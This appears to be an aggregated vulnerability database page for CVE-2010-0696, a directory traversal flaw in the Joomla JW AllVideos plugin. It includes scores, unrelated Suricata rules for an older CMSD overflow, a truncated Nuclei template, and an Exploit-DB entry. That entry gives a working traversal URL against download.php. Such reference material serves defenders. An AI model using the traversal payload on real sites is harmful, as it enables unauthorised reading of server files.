CVE-2010-0696
published 2010-02-23CVE-2010-0696: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote…
PriorityP343medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
28.22%
97.9th percentile
Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlaworks | jw_allvideos | — | — |
| joomlaworks | jw_allvideos | — | — |
| joomlaworks | jw_allvideos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101908; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 06|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_jump:4,0,relative,align; byte_test:4,>,1000,28,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; reference:url,www.cert.org/advisories/CA-99-08-cmsd.html; classtype:misc-attack; sid:2101909; rev:14; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt"; content:"|00 01 86 E4|"; depth:4; offset:12; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101907; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Joomla! Component Jw_allVideos - Arbitrary File Download
exploitdb·2010-02-14
CVE-2010-0696 Joomla! Component Jw_allVideos - Arbitrary File Download
Joomla! Component Jw_allVideos - Arbitrary File Download
---
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
#################
Nuclei
Joomla! Component Jw_allVideos - Arbitrary File Retrieval
nuclei·CVSS 5.0
CVE-2010-0696 [MEDIUM] Joomla! Component Jw_allVideos - Arbitrary File Retrieval
Joomla! Component Jw_allVideos - Arbitrary File Retrieval
A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
Template:
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
author: daffainfo
severity: medium
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
impact: |
An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
re
http://osvdb.org/62331http://secunia.com/advisories/38587http://www.exploit-db.com/exploits/11447http://www.joomlaworks.gr/content/view/77/34/http://www.securityfocus.com/bid/38238http://osvdb.org/62331http://secunia.com/advisories/38587http://www.exploit-db.com/exploits/11447http://www.joomlaworks.gr/content/view/77/34/http://www.securityfocus.com/bid/38238
2010-02-23
Published